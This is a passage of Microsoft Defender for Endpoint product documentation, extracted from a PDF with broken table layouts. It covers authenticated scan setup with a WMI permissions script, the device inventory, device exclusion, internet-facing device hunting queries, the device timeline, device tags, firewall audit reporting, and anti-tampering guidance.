To configure and apply the permission to a group of devices to be scanned using a

group policy, see Configure a group of devices with a group policy.
Devices to be scanned Description

requirements
Windows Management To enable remote Windows Management Instrumentation

Instrumentation (WMI) is enabled (WMI):
Verify the Windows Management Instrumentation
service is running.
Go to Control Panel > All Control Panel Items >
Windows Defender Firewall > Allowed applications
and ensure Windows Management Instrumentation
(WMI) is allowed through Windows Firewall.
Scanning account is a member of The scanning account must be a member of the

Performance Monitor Users group Performance Monitor Users group on the device to be
scanned.
Performance Monitor Users group To verify or enable these permissions:

has 'Enable Account' and 'Remote Run wmimgmt.msc.
Enable' permissions on Root/CIMV2 Right click WMI Control (Local) and select
WMI namespace Properties.
Go to the Security tab.
Devices to be scanned Description
requirements
Select the relevant WMI namespace and select

Security.
Add the specified group and select to allow the
specific permissions.
Select Advanced, choose the specified entry and
select Edit.
Set Applies To to "This namespace and
subnamespaces".
Performance Monitor Users group To verify or enable these permissions:

should have permissions on DCOM Run dcomcnfg.
operations Navigate to Component Services > Computers >
My Computer.
Right click My Computer and choose Properties.
Go to the COM Security tab.
Go to Launch and Activation Permissions and select
Edit Limits.
Add the specified group and select to allow Remote
Activation.
Configure a group of devices with a group policy

A group policy will let you bulk apply the configurations required, as well as the
permissions required for the scanning account, to a group of devices to be scanned.
Follow these steps on a domain controller to configure a group of devices at the same
time:
Step Description
Create a new Group Policy Object On the domain controller open the Group Policy
Management Console.
Follow these steps to Create a Group Policy Object.
Once your Group Policy Object (GPO) is created,
right-click on your GPO and select Edit to open the
Group Policy Management Editor console and
complete the steps below.
Enable Windows Management To enable remote Windows Management Instrumentation

Instrumentation (WMI) (WMI):
Go to Computer Configuration > Policies > Windows
Settings > Security Settings > System Services.
Right-click Windows Management Instrumentation.
Step Description
Select the Define this policy setting box and choose

Automatic.
Allow WMI through the firewall To allow Windows Management Instrumentation (WMI)
through the firewall:
Settings > Security Settings > Windows Defender
Firewall and Advanced Security > Inbound Rules.
Right-click and select New Rule.
Choose Predefined and select Windows
Management Instrumentation (WMI) from the list.
Then select Next.
Select the Windows Management Instrumentation
(WMI-In) checkbox. Then select Next.
Select Allow the connection. Then select Finish.
Right-click the newly added rule and select
Properties.
Go to the Advanced tab and uncheck the Private and
Public options as only Domain is required.
Grant permissions to perform To grant permissions to perform DCOM operations:

DCOM operations Go to Computer Configuration > Policies > Windows
Settings > Security Settings > Local Policies >
Security Operations.
Right-click DCOM: Machine Launch Restrictions in
Security Descriptor Definition Language (SDDL)
syntax and select Properties.
Select Define this policy setting box and select Edit
Security.
Add the user or group you are granting permissions
to and select Remote Activation.
Grant permissions to the Create a PowerShell script. See the Example

Root\CIMV2 WMI namespace by PowerShell script later in this article for a
running a PowerShell script via recommended script you can modify according to
group policy: your needs.
Settings > Scripts (Startup/Shutdown) > Startup
Go to the PowerShell Scripts tab.
Select Show Files and copy the script you created to
this folder
Return to the scripts configuration windows and
select Add.
Enter the script name.
Example PowerShell script
Use the following PowerShell script as a starting point to grant permissions to the
Root\CIMV2 WMI namespace via group policy:
PowerShell
Param ()
Process {
$ErrorActionPreference = "Stop"
$accountSID = "S-1-5-32-558" # Performance Monitor Users built-in group,
please change or pass parameter as you wish
$computerName = "."
$remoteparams = @{ComputerName=$computerName}
$invokeparams = @{Namespace="root\cimv2";Path="__systemsecurity=@"} +
$remoteParams
$output = Invoke-WmiMethod @invokeparams -Name GetSecurityDescriptor

if ($output.ReturnValue -ne 0) {
throw "GetSecurityDescriptor failed: $($output.ReturnValue)"
}
$acl = $output.Descriptor
$CONTAINER_INHERIT_ACE_FLAG = 0x2
$ACCESS_MASK = 0x21 # Enable Account + Remote Enable
$ace = (New-Object
System.Management.ManagementClass("win32_Ace")).CreateInstance()
$ace.AccessMask = $ACCESS_MASK
$ace.AceFlags = $CONTAINER_INHERIT_ACE_FLAG
$trustee = (New-Object
System.Management.ManagementClass("win32_Trustee")).CreateInstance()
$trustee.SidString = $accountSID
$ace.Trustee = $trustee
$ACCESS_ALLOWED_ACE_TYPE = 0x0
$ace.AceType = $ACCESS_ALLOWED_ACE_TYPE
$acl.DACL += $ace.psobject.immediateBaseObject
$setparams =
@{Name="SetSecurityDescriptor";ArgumentList=$acl.psobject.immediateBaseObjec
t} + $invokeParams
$output = Invoke-WmiMethod @setparams

if ($output.ReturnValue -ne 0) {
throw "SetSecurityDescriptor failed: $($output.ReturnValue)"
}
}
Once the GPO policy is applied to a device, all the required settings will be applied and
your gMSA account will be able to access and scan the device.
Configure a new authenticated scan

To configure a new authenticated scan:
1. Go to Settings > Device discovery > Authenticated scans in the Microsoft

Defender portal .
2. Select Add new scan and choose Windows authenticated scan and select Next.
3. Enter a Scan name.
4. Select the Scanning device: The onboarded device you'll use to scan the
unmanaged devices.
5. Enter the Target (range): The IP address ranges or hostnames you want to scan.
You can either enter the addresses or import a CSV file. Importing a file will
override any manually added addresses.
6. Select the Scan interval: By default, the scan will run every four hours, you can
change the scan interval or have it only run once, by selecting 'Do not repeat'.
7. Choose your Authentication method - there are two options to choose from:
Kerberos (preferred)
Negotiate
７ Note
Negotiate option will fallback to NTLM in cases where Kerberos fails. Using
NTLM is not recommended as it is not a secure protocol.
8. Enter the credentials Microsoft Defender Vulnerability Management will use to

remotely access the devices:
Use azure KeyVault: If you manage your credentials in Azure KeyVault you
can enter the Azure KeyVault URL and Azure KeyVault secret name to be
accessed by the scanning device to provide credentials
For the Azure KeyVault secret value use gMSA account details in the format
Domain;Username
9. Select Next to run or skip the test scan. For more information on test scans, see
Scan and add network devices.
10. Select Next to review the settings and then select Submit to create your new
authenticated scan.
７ Note
As the authenticated scanner currently uses an encryption algorithm that is not

compliant with Federal Information Processing Standards (FIPS), the scanner can't
operate when an organization enforces the use of FIPS compliant algorithms.
To allow algorithms that are not compliant with FIPS, set the following value in the
registry for the devices where the scanner will run:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlg
orithmPolicy with a DWORD value named Enabled and value of 0x0
FIPS compliant algorithms are only used in relation to departments and agencies of
the United States federal government.
Authenticated scan for Windows APIs

You can use APIs to create a new scan and view all existing configured scans in your
organization. For more information, see:
Get all scan definitions

Add, delete or update a scan definition
Get all scan agents
Get scan agent by Id
Get scan history by definition
Get scan history by session
Related articles
Network devices
Device inventory
Article • 02/21/2024
Applies to:

The Device inventory shows a list of the devices in your network where alerts were
generated. By default, the queue displays devices seen in the last 30 days.
At a glance you see information such as domain, risk level, OS platform, and other
details for easy identification of devices most at risk.
７ Note
The device inventory is available in different Microsoft Defender XDR services. The
information available to you will differ depending on your license. You'll get the
most complete set of capabilities when using Microsoft Defender for Endpoint
Plan 2 .
７ Note
Risk Level which can influence enforcement of conditional access and other security
policies on Microsoft Intune, is available in Windows today.
There are several options you can choose from to customize the devices list view. On
the top navigation you can:
Add or remove columns

Export the entire list in CSV format
Select the number of items to show per page
Apply filters
During the onboarding process, the Devices list is gradually populated with devices as
they begin to report sensor data. Use this view to track your onboarded endpoints as
they come online, or download the complete endpoint list as a CSV file for offline
analysis.
７ Note
If you export the device list, it will contain every device in your organization. It
might take a significant amount of time to download, depending on how large your
organization is. Exporting the list in CSV format displays the data in an unfiltered
manner. The CSV file will include all devices in the organization, regardless of any
filtering applied in the view itself.
Sort and filter the device list

You can apply the following filters to limit the list of alerts and get a more focused view.
Device name
During the Microsoft Defender for Endpoint onboarding process, devices onboarded to
MDE are gradually populated into the device inventory as they begin to report sensor
data. Following this, the device inventory is populated by devices that are discovered in
your network through the device discovery process. The device inventory has three tabs
that list devices by:
Computers and Mobile: Enterprise endpoints (workstations, servers, and mobile

devices)
Network devices: Devices like routers and switches
IoT devices: Devices like printers and cameras
Navigate to the Device inventory page

Access the device inventory page by selecting Devices from the Assets navigation menu
in the Microsoft Defender portal.
Device inventory overview

The device inventory opens on the Computers and Mobile tab. At a glance you see
information such as device name, domain, risk level, exposure level, OS platform,
onboarding status, sensor health state, and other details for easy identification of
devices most at risk.
Use the Onboarding Status column to sort and filter by discovered devices, and devices
that are already onboarded to Microsoft Defender for Endpoint.
From the Network devices and IoT devices tabs, you'll also see information such as
vendor, model, and device type:
７ Note
Device discovery Integration with Microsoft Defender for IoT is available to help
locate, identify, and secure your complete OT/IOT asset inventory. Devices
discovered with this integration will appear on the IoT devices tab. For more
information, see Device discovery integration.
When Defender for IoT is configured, you also can view the devices there. See
Manage your IoT devices with the device inventory for organizations.
At the top of each device inventory tab, you can see the total number of devices, the
number of devices that aren't yet onboarded, and the number of devices that are
identified as a higher risk to your organization. You can use this information to help you
prioritize devices for security posture improvements.
The Newly discovered device count for network devices and IoT devices tabs, shows the
number of new devices discovered, in the last 7 days, listed in the current view.
Explore the device inventory

There are several options you can choose from to customize the device inventory view.
On the top navigation for each tab you can:
Search for a device by name

Search for a device by the most recently used IP address or IP address prefix
Add or remove columns
Export the entire list in CSV format for offline analysis
Select the date range to display
Apply filters
７ Note
If you export the device list, it will contain every device in your organization. It
might take a significant amount of time to download, depending on how large your
organization is. Exporting the list in CSV format displays the data in an unfiltered
manner. The CSV file will include all devices in the organization, regardless of any
filtering applied in the view itself.
You can use the sort and filter functionality available on each device inventory tab to get
a more focused view, and to help you assess and manage the devices in your
organization.
The counts on the top of each tab will be updated based on the current view.
Use filters to customize the device inventory

views
ﾉ Expand table
Filter Description
Risk level The risk level reflects the overall risk assessment of the device based on a
combination of factors, including the types and severity of active alerts on the
device. Resolving active alerts, approving remediation activities, and suppressing
subsequent alerts can lower the risk level.
Exposure The exposure level reflects the current exposure of the device based on the
level cumulative impact of its pending security recommendations. The possible levels
are low, medium, and high. Low exposure means your devices are less vulnerable
from exploitation.
If the exposure level says "No data available," there are a few reasons why:
- Device stopped reporting for more than 30 days. In that case it's considered
inactive, and the exposure isn't computed.
- Device OS not supported - see minimum requirements for Microsoft Defender
for Endpoint.
- Device with stale agent (unlikely).
Tags Filter the list based on the grouping and tagging that you've added to individual
devices. See Create and manage device tags.
Device value Filter the list based on whether the device is marked as high value or low value.
Exclusion Filter the list based on whether or not the device is excluded. For more
state information, see Exclude devices.
OS Platform Filter by the OS platforms you're interested in investigating
(Computers and mobile and IoT devices only)
First seen Filter your view based on when the device was first seen in the network or when
it's first reported by the Microsoft Defender for Endpoint sensor.
Filter Description
(Computers and mobile and IoT devices only)
Windows Filter by the Windows versions you're interested in investigating. If 'future

version version' appears in the Windows version field, it can mean:
- This is a prerelease build for a future Windows release

- The build has no version name
- The build version name isn't yet supported
In all these scenarios, where available, the full OS version can be seen in the
device details page.
(Computers and mobile only)
Sensor health Filter by the following sensor health states, for devices onboard to Microsoft
state Defender for Endpoint:
- Active: Devices that are actively reporting sensor data to the service.
- Inactive: Devices that stopped sending signals for more than seven days.
- Misconfigured: Devices that have impaired communications with service or are
unable to send sensor data.
Misconfigured devices can further be classified to:
- No sensor data
- Impaired communications
For more information on how to address issues on misconfigured devices, see,
Fix unhealthy sensors.
Onboarding Onboarding status indicates whether the device is currently onboarded to

status Microsoft Defender for Endpoint or not. Device discovery must be enabled for
this filter to appear. You can filter by the following states:
- Onboarded: The endpoint is onboarded to Microsoft Defender for Endpoint.
- Can be onboarded: The endpoint was discovered in the network as a supported
device, but it's not currently onboarded. Microsoft highly recommends
onboarding these devices.
- Unsupported: The endpoint was discovered in the network, but isn't supported
by Microsoft Defender for Endpoint.
- Insufficient info: The system couldn't determine the supportability of the
device.
Antivirus Filter the view based on whether the antivirus status is disabled, not updated or
status unknown.

Filter Description
Group Filter the list based on the group you're interested in investigating.
Managed by Managed by indicates how the device is being managed. You can filter by:
- Microsoft Defender for Endpoint
- Microsoft Intune, including co-management with Microsoft Configuration
Manager via tenant attach
- Microsoft Configuration manager (ConfigMgr)
- Unknown: This issue could be due the running an outdated Windows version,
GPO management, or another non-Microsoft MDM.
Device Type Filter by the device type you're interested in investigating.
(IoT devices only)
Mitigation Filter by isolation or containment status of a device.

status
Use columns to customize the device inventory

views
You can add or remove columns from the view and sort the entries by clicking on an
available column header.
On the Computer and Mobiles tab, select Customize columns to see the columns
available. The default values are checked in the following image:
On the Network devices tab, select Customize columns to see the columns available.
The default values are checked in the following image:
On the IoT devices tab, select Customize columns to see the columns available. The
default values are checked in the following image:
Related articles
Investigate devices in the Microsoft Defender for Endpoint Devices list
 Tip
Feedback

Exclude devices
Article • 02/07/2023
Applies to:

Exclude devices from vulnerability

management
Excluding devices that are inactive, duplicate, or out of scope allows you to focus on
discovering and prioritizing the risks on your active devices. This action can also help
reflect a more accurate vulnerability management exposure score, as the excluded
devices won't be visible in your vulnerability management reports.
Once devices are excluded, you won't be able to view updated or relevant information
about vulnerabilities and installed software on these devices. It affects all vulnerability
management pages, reports, and related tables in advanced hunting.
Even though the device exclusion feature removes the device data from vulnerability
management pages and reports, the devices remain connected to the network and can
still be a risk to the organization. You'll be able to cancel the device exclusion at any
time.
How to exclude a device

You can choose to exclude a single device or multiple devices at the same time.
Exclude a single device

1. Go to the Device inventory page and select the device to exclude.
2. Select Exclude from the action bar on the device inventory page or from the
actions menu in the device flyout.
3. Select a justification:
Inactive device
Duplicate device
Device doesn't exist
Out of scope
Other
4. Type a note and select Exclude device.

You can also exclude a device from its device page.
７ Note
Excluding active devices is not recommended, since it is especially risky to not have
visibility into their vulnerability info. If a device is active and you try to exclude it,
you'll get a warning message and a confirmation pop-up asking if you are sure you
want to exclude an active device.
It can take up to 10 hours for a device to be fully excluded from vulnerability

management views and data.
Excluded devices are still visible in the Device inventory list. You can manage your view
of excluded devices by:
Adding the Exclusion state column to the device inventory view.

Using the Exclusion state filter to view the relevant list of devices.
Bulk device exclusion

You can also choose to exclude multiple devices at the same time:
1. Go to the Device inventory page and select the devices to exclude.
2. From the actions bar, select Exclude.
3. Choose a justification and select Exclude device.
If you select multiple devices in the device list with different exclusion statuses, the
exclude selected devices flyout will provide you details on how many of the selected
devices are already excluded. You can exclude the devices again, but the justification
and notes will be overridden.
Once a device is excluded, if you go to the device page of an excluded device, you won't
be able to see data for discovered vulnerabilities, software inventory or security
recommendations. The data also won't show up in vulnerability management pages,
related advanced hunting tables and the vulnerable devices report.
Stop excluding a device

You'll be able to stop excluding a device at any time. Once devices are no longer
excluded, their vulnerability data will be visible in vulnerability management pages,
reports, and in advanced hunting. It may take up to 8 hours for the changes to take
effect.
1. Go to the Device inventory, select the excluded device to open the flyout, and then
select Exclusion details
2. Select Stop exclusion
See also
Device inventory
 Tip
Feedback

Internet-facing devices
Article • 07/10/2023
Applies to:

As threat actors continuously scan the web to detect exposed devices they can exploit
to gain a foothold in internal corporate networks, mapping your organization's external
attack surface is a key part of your security posture management. Devices that can be
connected to or are approachable from the outside pose a threat to your organization.
Microsoft Defender for Endpoint automatically identifies and flags onboarded, exposed,
internet-facing devices in the Microsoft Defender portal . This critical information
provides increased visibility into an organization's external attack surface and insights
into asset exploitability.
７ Note
Currently, only Windows devices onboarded to Microsoft Defender for Endpoint

can be identified as internet-facing. Support for other platforms will be available in
upcoming releases.
Devices flagged as internet-facing

Devices that are successfully connected through TCP or identified as host reachable
through UDP will be flagged as internet-facing in the Microsoft Defender portal .
Defender for Endpoint uses different data sources to identify the devices to flag:
External scans are used to identify which devices are approachable from the
outside.
Device network connections, captured as part of Defender for Endpoint signals,
help to identify external incoming connections that reach internal devices.
Devices can be flagged as internet-facing when a configured firewall policy (host firewall
rule or enterprise firewall rule) allows inbound internet communication.
Understanding your firewall policy, and your devices that are intentionally internet-
facing as opposed to those that may compromise your organization, provides critical
information when it comes to mapping your external attack surface.
View internet-facing devices

For each onboarded device identified as internet-facing, the internet facing tag appears
in the Tags column in the device inventory in the Microsoft Defender portal. To view
internet-facing devices:
1. Go to Assets > Device in the Microsoft Defender portal .
Hover over the internet-facing tag to see why it was applied, possible reasons are:
This device was detected by an external scan

This device received external incoming communication
At the top of the page, you can view a counter that shows the number of devices that
have been identified as internet-facing and are potentially less secure.
You can use filters to focus in on internet-facing devices and investigate the risk they
may introduce into your organization.

７ Note
If no new events for a device occur for 48 hours, the Internet-facing tag is removed
and it will no longer be visible in the Microsoft Defender portal.
Investigate your internet-facing devices

To learn more about an internet-facing device, select the device in the device inventory
to open its flyout pane:
This pane includes details on whether the device was detected by a Microsoft external
scan or received an external incoming communication. The external network interface
address and port fields provide details on the external IP and port that were scanned at
the time this device was identified as internet facing.
The local network interface address and port for this device, along with the last time the
device was identified as internet facing are also shown.
Use advanced hunting

Use advanced hunting queries to gain visibility and insights into the internet-facing
devices in your organization, for example:
Get all internet facing devices

Use this query to find all devices that are internet facing.
Kusto
// Find all devices that are internet-facing

DeviceInfo
| where IsInternetFacing
| extend InternetFacingInfo = AdditionalFields
| extend InternetFacingReason = extractjson("$.InternetFacingReason",
InternetFacingInfo, typeof(string)), InternetFacingLocalPort =
extractjson("$.InternetFacingLocalPort", InternetFacingInfo, typeof(int)),
InternetFacingScannedPublicPort =
extractjson("$.InternetFacingPublicScannedPort", InternetFacingInfo,
typeof(int)), InternetFacingScannedPublicIp =
extractjson("$.InternetFacingPublicScannedIp", InternetFacingInfo,
typeof(string)), InternetFacingLocalIp =
extractjson("$.InternetFacingLocalIp", InternetFacingInfo, typeof(string)),
InternetFacingTransportProtocol=extractjson("$.InternetFacingTransportProtoc
ol", InternetFacingInfo, typeof(string)), InternetFacingLastSeen =
extractjson("$.InternetFacingLastSeen", InternetFacingInfo,
typeof(datetime))
This query returns the following fields for each internet-facing device with their
aggregated evidence in the "AdditionalFields" column.
InternetFacingReason: Whether the device was detected by an external scan or

received incoming communication from the internet
InternetFacingLocalIp: The local IP address of the internet facing interface
InternetFacingLocalPort: The local port where internet facing communication was
observed
InternetFacingPublicScannedIp: The public IP address that was externally scanned
InternetFacingPublicScannedPort: The internet facing port that was externally
scanned
InternetFacingTransportProtocol: The transport protocol used (TCP/UDP)
Get information on inbound connections

For TCP connections, you can gain further insights into applications or services identified
as listening on a device by querying DeviceNetworkEvents.
Use the following query for devices tagged with the reason This device received
external incoming communication:
Kusto
// Use this function to obtain the device incoming communication from public
IP addresses
// Input:
// DeviceId - the device ID that you want to investigate.
// The function will return the last 7 days of data.
InboundExternalNetworkEvents("<DeviceId>")
７ Note
Process related information is only available for TCP connections.
Use the following query for devices tagged with the reason This device was detected by
an external scan:
Kusto
DeviceNetworkEvents
| where DeviceId == ""
| where Protocol == "Tcp"
| where ActionType == "InboundInternetScanInspected"
For UDP connections, gain insights into devices that were identified as host reachable
but may not have established a connection (for example, as a result of the host firewall
policy) using the following query:
Kusto
DeviceNetworkEvents
| where DeviceId == ""
| where Protocol == "Udp"
| where ActionType == "InboundInternetScanInspected"
If the above queries fail to provide the relevant connections, you can use socket
collection methods to retrieve the source process. To learn more about different tools
and capabilities available to do this, see:
Defender for Endpoint live response

Microsoft Network Monitor
Netstat for Windows
Report inaccuracy
You can report an inaccuracy for a device with incorrect internet-facing information. For
the internet-facing device:
1. Open the device flyout from the Device inventory page

2. Select Report device inaccuracy
3. In the What part is inaccurate dropdown, select Device information
4. For Which information is inaccurate select the internet facing classification
checkbox from the dropdown
5. Fill in the requested details about what the correct information should be
6. Provide an email address (optional)
7. Select Submit Report
See also
Device inventory
 Tip
Feedback

Microsoft Defender for Endpoint device
timeline
Article • 11/06/2023
Applies to:

７ Note
The Defender for Endpoint device timeline helps you research and investigate
anomalous behavior on your devices more quickly. You can explore specific events and
endpoints to review potential attacks in your organization. You can review specific times
of each event, set flags to follow up for potentially connected events, and filter to
specific date ranges.
Custom time range picker:
Process tree experience – event side panel:


All MITRE techniques are shown when there's more than one related technique:
Timeline events are linked to the new user page:


Defined filters are now visible at the top of the timeline:
Techniques in the device timeline

You can gain more insight in an investigation by analyzing the events that happened on
a specific device. First, select the device of interest from the Devices list. On the device
page, you can select the Timeline tab to view all the events that occurred on the device.
Understand techniques in the timeline
） Important
Some information relates to a prereleased product feature in public preview which

In Microsoft Defender for Endpoint, Techniques are an additional data type in the event
timeline. Techniques provide more insight on activities associated with MITRE ATT&CK
techniques or subtechniques.
This feature simplifies the investigation experience by helping analysts understand the
activities that were observed on a device. Analysts can then decide to investigate further.
During preview, Techniques are available by default and shown together with events
when a device's timeline is viewed.
Techniques are highlighted in bold text and appear with a blue icon on the left. The
corresponding MITRE ATT&CK ID and technique name also appear as tags under
Additional information.
Search and Export options are also available for Techniques.
Investigate using the side pane

Select a Technique to open its corresponding side pane. Here you can see additional
information and insights like related ATT&CK techniques, tactics, and descriptions.
Select the specific Attack technique to open the related ATT&CK technique page where
you can find more information about it.
You can copy an entity's details when you see a blue icon on the right. For instance, to
copy a related file's SHA1, select the blue page icon.


You can do the same for command lines.


Investigate related events

To use advanced hunting to find events related to the selected Technique, select Hunt
for related events. This leads to the advanced hunting page with a query to find events
related to the Technique.

７ Note
Querying using the Hunt for related events button from a Technique side pane
displays all the events related to the identified technique but does not include the
Technique itself in the query results.
Customize your device timeline

On the upper right-hand side of the device timeline, you can choose a date range to
limit the number of events and techniques in the timeline.
You can customize which columns to expose. You can also filter for flagged events by
data type or by event group.
Choose columns to expose

You can choose which columns to expose in the timeline by selecting the Choose
columns button.

From there you can select which information set to include.
Filter to view techniques or events only

To view only either events or techniques, select Filters from the device timeline and
choose your preferred Data type to view.

Timeline event flags

Event flags in the Defender for Endpoint device timeline help you filter and organize
specific events when you're investigating potential attacks.
The Defender for Endpoint device timeline provides a chronological view of the events
and associated alerts observed on a device. This list of events provides full visibility into
any events, files, and IP addresses observed on the device. The list can sometimes be
lengthy. Device timeline event flags help you track events that could be related.
After you've gone through a device timeline, you can sort, filter, and export the specific
events that you flagged.
While navigating the device timeline, you can search and filter for specific events. You
can set event flags by:
Highlighting the most important events

Marking events that require deep dive
Building a clean breach timeline
Flag an event
1. Find the event that you want to flag.
2. Select the flag icon in the Flag column.


View flagged events

1. In the timeline Filters section, enable Flagged events.
2. Select Apply. Only flagged events are displayed.
You can apply more filters by clicking on the time bar. This will only show events prior to
the flagged event.
 Tip
Feedback

Article • 11/15/2023
７ Note
Applies to:

Add tags on devices to create a logical group affiliation. Device tags support proper
enable dynamic list creation as part of an incident. Tags can be used as a filter in the
Device inventory view, or to group devices. For more information on device grouping,
see Create and manage device groups.
７ Note
You can add tags on devices using the following ways:
Using the portal

Setting a registry key value
７ Note
There may be some latency between the time a tag is added to a device and its
availability in the devices list and device page.
To add device tags using API, see Add or remove device tags API.
Add and manage device tags using the portal

1. Select the device that you want to manage tags on. You can select or search for a
device from any of the following views:
queue.
Devices inventory - Select the device name from the list of devices.
Search box - Select Device from the drop-down menu and enter the device
name.
You can also get to the alert page through the file and IP views.
2. Select Manage tags from the row of Response actions.
3. Type to find or create tags
Tags are added to the device view and will also be reflected on the Devices inventory
view. You can then use the Tags filter to see the relevant list of devices.
７ Note
Filtering might not work on tag names that contain parenthesis or commas.
When you create a new tag, a list of existing tags are displayed. The list only shows
tags created through the portal. Existing tags created from client devices will not be
displayed.
You can also delete tags from this view.
Add device tags by setting a registry key value
７ Note
Applicable only on the following devices:
Windows 11
Windows Server 2016
Windows 8.1
Windows 7 SP1
７ Note
The maximum number of characters that can be set in a tag is 200.
Devices with similar tags can be handy when you need to apply contextual action on a
specific list of devices.
Use the following registry key entry to add a tag on a device:
Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced

Threat Protection\DeviceTagging\
Registry key value (REG_SZ): Group

Registry key data: Name of the tag you want to set
７ Note
The device tag is part of the device information report that's generated once a day.
As an alternative, you may choose to restart the endpoint that would transfer a new
device information report.
If you need to remove a tag that was added using the above Registry key, clear the
contents of the Registry key data instead of removing the 'Group' key.
Add device tags by creating a custom profile in

Microsoft Intune
You can use Microsoft Intune to define and apply device tags. You can perform this task
by creating a device configuration profile using custom settings in Intune. For more
information, see Create a profile with custom settings in Intune.
In the Create the profile procedure, for step 3, choose either macOS or Windows
10 and later, depending on the devices you want to tag.
For Windows 10 or later, in the OMA-IRU settings section, for Data type, choose
String. For OMA-URI, type (or paste)
./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group .
For macOS, follow the guidance in Use custom settings for macOS devices in
Microsoft Intune.
 Tip
Feedback

Host firewall reporting in Microsoft
Article • 11/15/2023
Applies to:

If you're a Global or security administrator, you can now host firewall reporting to the
Microsoft Defender portal . This feature enables you to view Windows firewall
reporting from a centralized location.
What do you need to know before you begin?

You must be running Windows 10 or later, Windows Server 2012 R2 or later.
７ Note
For Windows2012 R2 and Windows Server 2016 to appear in Firewall reports,

these devices must be onboarded using the modern unified solution package.
For more information, see New functionality in the modern unified solution
for Windows Server 2012 R2 and 2016.
To onboard devices to the Microsoft Defender for Endpoint service, see here.
For Microsoft Defender portal to start receiving the data, you must enable Audit
Events for Windows Defender Firewall with Advanced Security:
Audit Filtering Platform Packet Drop
Audit Filtering Platform Connection
Enable these events by using Group Policy Object Editor, Local Security Policy, or
the auditpol.exe commands. For more information, see here.
The two PowerShell commands are:
auditpol /set /subcategory:"Filtering Platform Packet Drop"
/failure:enable
auditpol /set /subcategory:"Filtering Platform Connection"

/failure:enable
PowerShell
param (
[switch]$remediate
)
try {
$categories = "Filtering Platform Packet Drop,Filtering Platform

Connection"
$current = auditpol /get /subcategory:"$($categories)" /r | ConvertFrom-
Csv
if ($current."Inclusion Setting" -ne "failure") {
if ($remediate.IsPresent) {
Write-Host "Remediating. No Auditing Enabled. $($current |
ForEach-Object {$_.Subcategory + ":" + $_.'Inclusion Setting' + ";"})"
$output = auditpol /set /subcategory:"$($categories)"
/failure:enable
if($output -eq "The command was successfully executed.") {
Write-Host "$($output)"
exit 0
}
else {
Write-Host "$($output)"
exit 1
}
}
else {
Write-Host "Remediation Needed. $($current | ForEach-Object
{$_.Subcategory + ":" + $_.'Inclusion Setting' + ";"})."
exit 1
}
}
}
catch {
throw $_
}
The process
７ Note
Make sure to follow the instructions from the section above and properly configure
your devices for the early preview participation.
After enabling the events, Microsoft Defender XDR will start to monitor the data,
which includes:
Remote IP
Remote Port
Local Port
Local IP
Computer Name
Process across inbound and outbound connections
Admins can now see Windows host firewall activity here .
Additional reporting can be facilitated by downloading the Custom Reporting
script to monitor the Windows Defender Firewall activities using Power BI.
It can take up to 12 hours before the data is reflected.
Supported scenarios
Firewall reporting
From "Computers with a blocked connection" to device
Drill into advanced hunting (preview refresh)
Firewall reporting
Here are some examples of the firewall report pages. Here you'll find a summary of
inbound, outbound, and application activity. You can access this page directly by going
to https://security.microsoft.com/firewall .

These reports can also be accessed by going to Reports > Security Report > Devices
(section) located at the bottom of the Firewall Blocked Inbound Connections card.
From "Computers with a blocked connection" to device

Cards support interactive objects. You can drill into the activity of a device by clicking on
the device name, which will launch the Microsoft Defender portal in a new tab, and take
you directly to the Device Timeline tab.

You can now select the Timeline tab, which will give you a list of events associated with
that device.
After clicking on the Filters button on the upper right-hand corner of the viewing pane,
select the type of event you want. In this case, select Firewall events and the pane will
be filtered to Firewall events.

Drill into advanced hunting (preview refresh)
Firewall reports support drilling from the card directly into Advanced Hunting by
clicking the Open Advanced hunting button. The query will be pre-populated.
The query can now be executed, and all related Firewall events from the last 30 days can
be explored.
For more reporting, or custom changes, the query can be exported into Power BI for
further analysis. Custom reporting can be facilitated by downloading the Custom
Reporting script to monitor the Windows Defender Firewall activities using Power BI.
 Tip
Feedback

Protect your organization from the
effects of tampering
Article • 07/04/2023
Tampering is the general term used to describe attackers attempts to impair the
effectiveness of Microsoft Defender for Endpoint. The ultimate goal of attackers isn't to
affect just one device, but rather to achieve their objective such as launching a
ransomware attack. As such, the anti-tampering capabilities of Microsoft Defender for
Endpoint extend beyond preventing tampering of a single device to detecting attacks
and minimizing their impact.
Applies to:

Organization wide tamper resiliency is built on

Zero Trust
The foundation for defending against tampering is following a Zero Trust model.
Follow the best practice of least privilege. See Access control overview for
Windows.
Configure Conditional Access policies to keep untrusted users and devices isolated.
In order to provide an effective defense against tampering, devices must be healthy.
Onboard devices to Defender for Endpoint.

Make sure security intelligence and antivirus updates are installed.
Managed devices centrally, such as by Microsoft Intune, Microsoft Defender for
Endpoint Security Configuration Management, or Configuration Manager.
７ Note
On Windows devices, Microsoft Defender Antivirus can be managed by using

Group Policy, Windows Management Instrumentation (WMI), and PowerShell
cmdlets. However, those methods are more susceptible to tampering than by using
Microsoft Intune, Configuration Manager, or Microsoft Defender for Endpoint
Security Configuration Management. If you're using Group Policy, we recommend
disabling local overrides for Microsoft Defender Antivirus settings and disabling
local list merging.
You can view health status for Microsoft Defender Antivirus health and sensors in the
device health reports in Microsoft Defender for Endpoint.
Preventing tampering on a single device

Attackers use various tampering techniques to disable Microsoft Defender for Endpoint
on a single device. These techniques are prevented differently on different operating
systems.
ﾉ Expand table
Control OS Technique Families
Tamper protection Windows - Terminating/suspending processes

- Stopping/pausing/suspending services
- Modifying registry settings including exclusions
- Manipulating/hijacking DLLs
- Manipulation/modification of the file system
- Agent integrity
Tamper protection Mac - Terminating/suspending processes

- Manipulation/modification of the file system
- Agent integrity
Attack surface reduction rules Windows Kernel drivers (see Block abuse of exploited
vulnerable signed drivers)
Windows Defender Application Windows Kernel drivers (see Microsoft vulnerable driver
Control (WDAC) blocklist)
Understanding the different ways to prevent

driver based tampering on Windows
One of the most common tampering techniques is to use a vulnerable driver to gain
access to the kernel. This driver is often wrapped in an easy to deploy tool, but the
underlying technique is the same.
In order to prevent a driver based tampering on a single device, the device needs to be
configured to block the loading of that driver before the attack.
Microsoft provides several ways to keep devices well protected and up to date against
driver based tampering.
Broadest protection - Microsoft vulnerable driver

blocklist
The blocklist is updated with each new major release of Windows, typically 1-2 times per
year. Microsoft will occasionally publish future updates through regular Windows
servicing. With Windows 11 2022 update, the vulnerable driver blocklist is enabled by
default for all devices, but requires either memory integrity (also known as hypervisor-
